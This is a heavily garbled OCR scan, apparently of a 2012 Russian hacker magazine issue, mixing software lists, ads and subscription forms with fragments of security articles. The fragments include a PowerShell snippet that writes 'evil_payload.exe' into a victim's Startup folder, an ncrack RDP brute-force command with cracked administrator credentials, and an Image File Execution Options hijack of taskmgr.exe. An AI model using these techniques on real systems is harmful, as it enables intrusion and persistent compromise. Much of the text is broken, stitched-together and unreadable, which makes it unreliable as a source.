!.
Store
S-:
.....,
PS > [string]$hex = get-content -path

C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]: :WriteAllBytes(
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs \ Startup\evil_payload.exe" ,
$temp)
Camera
..
'"'
Facebook
Plu s
lr
- ~~
AppBra in
Mark ...
Blapk
Market
Browser
Clock
Contacts
Gallery
Dev Tools
"
~
Global Time
..
";~.~~/,...
jetBoy
L...LLU
11
Calculator
"
Email
r-
~
Latitude
Calendar
f.
Facebook
Lunar
Lander
Android-x86, n
Nexus One!
EJ
VirtuaBox,
n n ,
FakeDNS I it.ly/szUFXI I.
fakedns.py I it. l y/vhgamQ J.
DNS-
Malcode
Python !
40 !
IJ
HostsMan I it.ly/uZAVOX I.

DNS-,
Analysis Pack. ApateDNS,
DNS-
' . I
hosts.
, ,
I- . !
fakeds .p y,
. , , 99%
01/156/2012
:1
137
UNITS/ FAQ UNITED

r,1
1:'.1
n . n
. ,
CRL + SHIF +
, n
ESC?
Medium [
). , n
Process l
[bit.ly/ugFDpx) n Replace
Task Manager, n
181
High.
Low, Media
192.168.26.137:3389, CL=2
rdp://192.168.26.137:3389 (EIO 1) Login
failed: 'administrator' 'admin'
n , -n
Oiscovered credentials
rdp :// 192.168.26.137:3389 'administrator' 'admin123'
. n
Pro cess
[View 7 Select
Columns 7 lntegrity Level). n
r.1
1:'.1
n n ,
- ? n,
nn :
- n ,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Image File
Exec ution Options\taskmgr.exe

taskmgr.exe
usermode.
, n, n,
KeePass
n n ,
KeePass
netsh n
netsh interface dump > netsh-config1.txt
- .
[n,
: \u ti 1s\Process 1 \ . ) .
High,
KeyPass
n. l
dump:
r.1
1:'.1
1'.8
. n
. - ,
nn n n
NETSETMAN [WWW.NETSETMAN.COM )?
181
,
, .
Debugger
n
:
n [
KeyPass) n
- n
# - -- - --------- --- - - --- -- - - -- -- -- -- # Interface IP Configuration
# ------------- -- -------------------
WEBSOCKE?
n ,
pushd interface ip
# Interface IP Configuration for "Local
n,
. ,
Area Connection 1"

set address name= "Local Area Connection
1" source=dhcp
set dns name= "Local Area Connection 1"
source=dhcp register=PRIMARY
set wins name= "Local Area Connection 1"
source=dhcp
popd
# End of int erface IP configuration
181
1.
n -
2.
, ,
n .
n ,
, -Wireshark
Run as administrator.
Windows lntegrity Levels
n .
[www.wireshark.org ).
n n
n WebSockets,
icacls,
n,
n [n,
SOAP).
n Firefox
- Temper Data [ it.ly/sM49Hk ),
Chml [ it.ly/sOBLCm ). n,
"-i:h") n n
"-nr"):
n ,
n
nn~
netsh -1:
chml file.zip -i:h -nr
netsh -f netsh-config1.txt
r.1
1:'.1
WINDOWS
LEVELS?
INTEGRIY
file.zip
Access is denied.
, n,
. :::
Windows Vista, 7
Server 2008,
, - mandatory integrity level s [MIL).
181
n,
RDP ?
n ,
181 n
RD-, TSGinder [ it . ly/uThpnS ).
n , n,
Microsoft
n -n
n n
, n.
n nn
. n
RD
n n
. n :
U!! Dr. !! !3 r.!! !3 ~!! ~~~~ !;:...,:~~~
n ~ ~ ~~~ 1~ ~ ~ 1:~::--~;;:?.J
ncrack [nmap.org/ncrack) nmap ,
..:.]
n ,
138
,
n ,
$ ncrack -vv -d7 --user administrator \

- /home/user/passlist.txt \
Rechct.aiDNSQuerito !P: (" ll7Q01
r.
U~delihed 1192168.86129
FakeDNS DNS . .
01/156/2012
A~ache
CIAT 1.02
ClamAV 0.97.3
DirBuste 0.12
AutoHideDeskto~lcons
All Free 150 Burner

Avidemux 2.5.5
AV5 Media Pla ~e r 4.1.8.93
ExifTool8.71
~roximity
>Deskto~
~~
IP 5canner 3.0 Beta 6

3.1.3.1
lncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioCiicker 8.11
Free[!roxy 4.10
Cli~Gab
Cheese 3.2.2
Clementine 0.7.1
Coolreade 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnu~lot 4.4.4
Handbrake 0.9.5
lmageagick 6.7.3-8
K9coov 2.3.7
1.2.5
IDclassifv 1.1
GenXE 0.9.0
Go l15MERO
Gsasl1.6.1
HOPPE R
Gadmin-openvpn-server 0.1.5
Fwbuilder 5.0.0.3568
Emulation Framework 1.0.0
>Securit~
Chatsniff 1.0
Clamtk 4.36
UNIX
>Net
5~stem ~l
3.6.2
WhoCrashed 3.02
Mouse Button Control 2.0
5ongird
Svchost Process Anal:tzer
Perestroika 4.0.0
Real em~ 3.60
5mart Delrag 2.2
Nimi Visuals
Aweather 0.6
Chrome 15
Dada mail 4.8.4
Evolution 3.2.2
Fiefox 8.0.1
Getleft 1.2
lnstantird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lft~ 4.3.3
Liferea 1.6.6
Lin~hone 3.4.3
Linuxdc2P..llQ.
5muxi 0.8
5tealthnet 0.8.7.9
5wift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1
1.10.1
5TDU Viewer 1.6.62
?.9 lmage Viewer 1.3
Ubuntu 5kin Pack 8.0
WindowTabs
Sonarca Sound Recorder 3.7.8
Free Screen Video Recorder

2.5.19
Jim 2.0.0
i 3.0.0.1442
Man~Cam 2.6.60
Photosca~e 3.5
Free Audio Converter 5.0.2
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
Tune 5.0
HDCione 4.0.7
JaBack 9.12
1.41
>S~stem
>Multimedia
Device Remover 0.9
>Net
WP5can 1.1
X-5can 3.3
0.9.1 7
E!_i~ear2.4.0
Netrek 3.3.0
5umataPDF
>Games
Nant 0.91
Open64 5.0
Padre 0.92
~ 1.7
Quexml 1.3. 7
.,t2 2.0.5
Ruby 1. 9.3-pQ
'@!grind 3.7.0
M aveyUo_3.0
Libmicrohtt~d
~lass2.0.0
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
~__l_
Window Maximizer v2.00

Windows-privesc-check
NMa~5i4 0.3 beta

PEiD Plugins
Rec 5tudio 4
thc-ssl-dos 1.4
U58 ~ 1.0
VanishCy t
VirtuaiKD 2.6
w3af 1.1
Windbgshark 0.0.1
NetworkMiner 1.2
GenXE 0.9.0
Hades
John the Ri~~er 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
Emulation Framework 1.0.0

File Disclosure Browser
BeEF 0.4.2.11
. 9
tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
>Devel
Buster Sandbox Anal:tzer 1.44
>Securit:t
Ariadne
Virtual Router
TweetMyPC 3.9
VideoCacheView 2.02
Terminals 2
Libreoffice 3.4.4
Metamo~hose 1.1.2
Ni~2 7.26.3
~
P~room 0.4.1
Tomboy__11]_
Wavesurfer 1.8.8~3
Xine 1.1.20
Xorriso 1.1.8
5k~~ Voice Changer 1.0

5mart5niff 1.91
RocketDock 1.35
1.9
UboroBot 2.0
ViewFD 2.3.0
Votumouse 1.72
Win5~1it Revolution 11.04
Rainmeter 2.1
7stacks 1.5
Droid ~l 0.8.8.2
EssentiaiPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu ools 6.0.1
FreeCommander 2009.02
Pointer5tick 1.21
Q-Dir 4.87
>Misc
5DL 1.2.14
5t~leCo~ 4.6
TRe~lacer 2.11
Utilu IE Collection 1.7.2.0
~~ter2.4.3
AjaxControiToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook # 5DK 5.3.2
1.4.0
Heidi5QL 6.0
HiAsm 4.4
Json.N ET 4.0
Mocha 0.0.8
PHPExcel1.7.6
V5 1.1
>Develo~ment
WINDOWS
12.1
WinamD 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widqet 2.1 .1
JollysFastVNC 1.32
Mag ican 0.9.63
Mou 0.7.0
RaidEve 2.0
5ource 1.2. 9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Clementine Music Player
Amava 11.3.1
,t;p~ Hack 1.1
Aotana 5tudio 3.0
Art of lllusion 2.9
1.2
Q~en5U5 E
>X-distr
0.8.6
Css20111030
Di 4.31
Freei~a 2.1.3
Glpi 0.80.5
Greo 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pis 6.1.0.8729
Pl-kernel 3.1.3
~~nctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabix 1.8.9
A~t-dater
>System
Postg~!.i.lJ
Aoache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1 - ~ 1
Cu~s 1.5.0
DhcQill
Dovecot 2.0.16
Freeradius 2.1.12
1!ghtt~d 1.4.29
"11291 5.5.18
Nsdi2.9
Openldap 2.4.27
Openvpn 2.2.1
Postlix 2.8.7
>Server
~wi re 2.4.2.2
w3a-f-1.-1- -
~swan4.6. 1
. 7.1
John the Ri"'~~'-'e'-r-"1."-7."-9_ _ __

Naxsi 0.41
Nmap5i
Vulneraility Hunter 1.1.4.6
Rec 5tudio 4
Revelation 0.4.12
sqlsus . 7.1
ENCRYPTION
HAHTML5
PHONEGAP:
---
36 , 60
II .
L-
XML.
ANDROID
(j
2~:g
--"
frlhnrmet
trame}IIIIJd
:230.
800
!
191

2200
. (]
23/ ,
(250 )
- 30 ,
- 31 ,
- 31 .
8.5
DVD
!
!
,
, :
+ OVD
Total Football
+ OVO
DVD
OVDXpert
+ OVO
+ OVD
Smoke
+ 2 OVD
+ OVO
Digital Photo
+ DVD
+ DVD
1.

, ,
2.
3.
shop.glc.ru .
500
12
6
2200
1260
.
.
- -
e-mail: subsc riberag lc.ru ;

: [495) 545-09-06;
: 115280, ,
. , 19, ,
5 . , NQ 21,
000

+ +
2 DVD:162
, .
[ 35 % , )
!
.
12 3890 [24 ]
6 2205 [12 ]
? infocJglc .u
, , ].
no n
8[495]663-82-77 [ ! 8 [800] 200-3-999 [
D
D
12
_ _ __ _ _ _ _ 2011
7729410015
000
"
>>, .
No 40702810509000132297
No 30101810900000000990
D
D
04453990
**
( )
( )
770401001

<< _ _ _ _ _ _ _ >>
. . .
2011
. . .

7729410015
000
<< >>, .
/
No 407021 0509000132297
No 30101810900000000990
/
Q
<<. _ _ _ _ __
"" n r
n1-1 111
770401001
( )
e-mail
044583990
...
>>
2011
UNITS/WWW2
ldliilildil\fJII
www . outepw n. com
, n
. , mac_find [
-l phenoelit [
l. -
, . ,
, ,
I- . ,
:1.
lti[ltllil
ki cksend.com
,
Rapidshae , n
. -
, n
e-mail
. , ,
, , n: <<

e-mail
1 .
500
? , ,
- .
111111
@proXPN
Wllatpro~ll d.,.-
. upgr-.youton-tc_\IOII_,'o'F'Neno;rypiiOn
setont .. l'fpe1oolcometi!OifQIIIOSLatl<lc .... to3G
!Jt'\'OU1~:1"'<3!1._CI!IONWI!me\
ge/iii'IIPI<!'IIIIht.IS.A.UI(C(I'It
!lo\IO)OUtpiSS-CIC,ue<IIIC-U~Cie~
ometr.eplanas~on)'IIUI..,;tD ~.ts
po x pn. c om
, N,- n-lik-
VPN-cepep . ,
OpenVPN,
:!et!llle~)WVbl
lf.ltt.iif.lll
call:l
ctltl)1llon\les.
r.tconi.,.:Uwell~
n.r'llnotesiOIOUI-)'00~
, . ,
N . , . ,
. [
, WiFi-xocoyl,
.
..
VN-
JPC 2
Hom
IIVtrWIIId 10
jpc2.com
About JPC2
run 8ltOihlr opendlng system Iit 4ld not w.nt 10 ln8l8ll anylhlng?
Welllt811 Wll8t ...... VlnUIIIzatlan ln
w p8DI
<< >>.
Javascipt Emulato [ be l lad . o g/js l inux l,

[ JavaSciptl, Linux.
JPC 2
, ,
jpc2.com,
Windows
Ubuntu-
Java
, .
Windows Ubuntu
01/156/2012
UNITS 1GEEK ART
CODE
UNITS/ 2012
I I
NY2K+12
- ,
. USS
MUSTVISIT ,

20-23
: . -
14-16
30-31
2012
.d
Hack
Days
HITB
BLACKHAT
PHDAYS
confer ence.hitb.ora
www. ackhat
com
CONFIDENCE
www.ohdays.ru

PH DAYS
confjdence.orq.pl
, ,
. -
, -
, ,
. ,
26-29
F-.
25-26
2012
:1.
OEFCON RUSSIA
u
OCG *
7812
DEFCON
'2012
www.defcon .org
cc.org.ru
www.zeroniqhts.ru
, 20-
dmsn- .
- .
: -
. -
ZERONIGHTS
DEFCON
RUSSIA
www. d~f~oo-[yssja . [y
2011
, -
I/ -,
. -
'
'
'
01 / 156/201 2
I
*
OT&OPHbiE
, n .
, , n
TASH
.
3 .

Haker

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Haker

Uploaded by

Copyright:

Available Formats

Fl

cc dushock >> ( adushockfareal.xakep.u )

shop.g lc. ru / xake p.

Zapolex, . 219 833 .

Lotus Oomio tll

BitDefede, ESET NOD32, F-Secue, Outpost Secuity,

Applidium: appl idium .com/en/news/

<< BCKpTA Siri .

Ubuntu 14.04, 2014 . n,

Hotmail, Gmail, Google, Microsoft

lnstant Digital Camera.

Polaroid. Z340 lnstant Digital Camera $300.

ln ternet Systems Consortium .

- " _ ,._""_, ___ - - ,.

WEXLER.BOOK 7001. Wexler

Firefox with Bing

. U> -z... \--.:,,,.

>>. Opeat io n Daknet

.onion- Hidden Wiki,

Lol ita City

pastebin . com/1 LH nz EW.

I-: http:!/4 ..2;

WUII~4if ... tflt.tllilo

MAIL.RU GRU , Twitter. , .

The Cotton Candy

Devii Rob ber

5am sung Exynos 1,2 [

, 5amsung Gala xy 5111.

, D evii Robb e roapye

[magnified keysl. iSpy n

Flash Pl ayer iOS.

Flex SDK. Flex 4.6 SDK,

>> iPhoe T-Moile,

Damn Small XSS Scanne [DSXS).

Damn Small XSS

< hef= " ... ">, ,

L- < hef= " ... ">,

online backup, online backup data,

3/ 26/ 2011 7:4 5

3/26/ 2011 5:14

Google AdWods [ adwods.google.com ].

lplaintextl llirstfaplaintext .su, www.plaintext.sul

BEAST Padding Oracle Attack

AES_ENC(k, IV xor [ 0 ]);

AES_DEC(k , [~) xor IV;

MSK, IIV MSK, C[DJI

Extesie Makup Laguage [

X[j] = ASCIICode(NULL) xor IV2[j]

IV2 xor AES_DEC( k,

Rampat WS-Secu ity.

lmessage flow]. lmessage flow]-

ASCII Oxl F ! 09,

IOx26] < >> > .

tue, SOAP(AES_ENC_CBC[k, [IV, CIJI

PAD(M) ;; (IV xor AES_DEC(k,

Message flow Apache Axis2

C;[IV, [1], ... , C[d]l,

Input: (;([ 0 ] ; IV,

X[i)[j) ; FindXbyte(C[i), iv, j)

WSDL !Web Sevices Desciption Languagel, XML. -

RPC IRemote du calls,

SOA !Sevice-oiented achitectue,

GET, POST, PUT, DELETE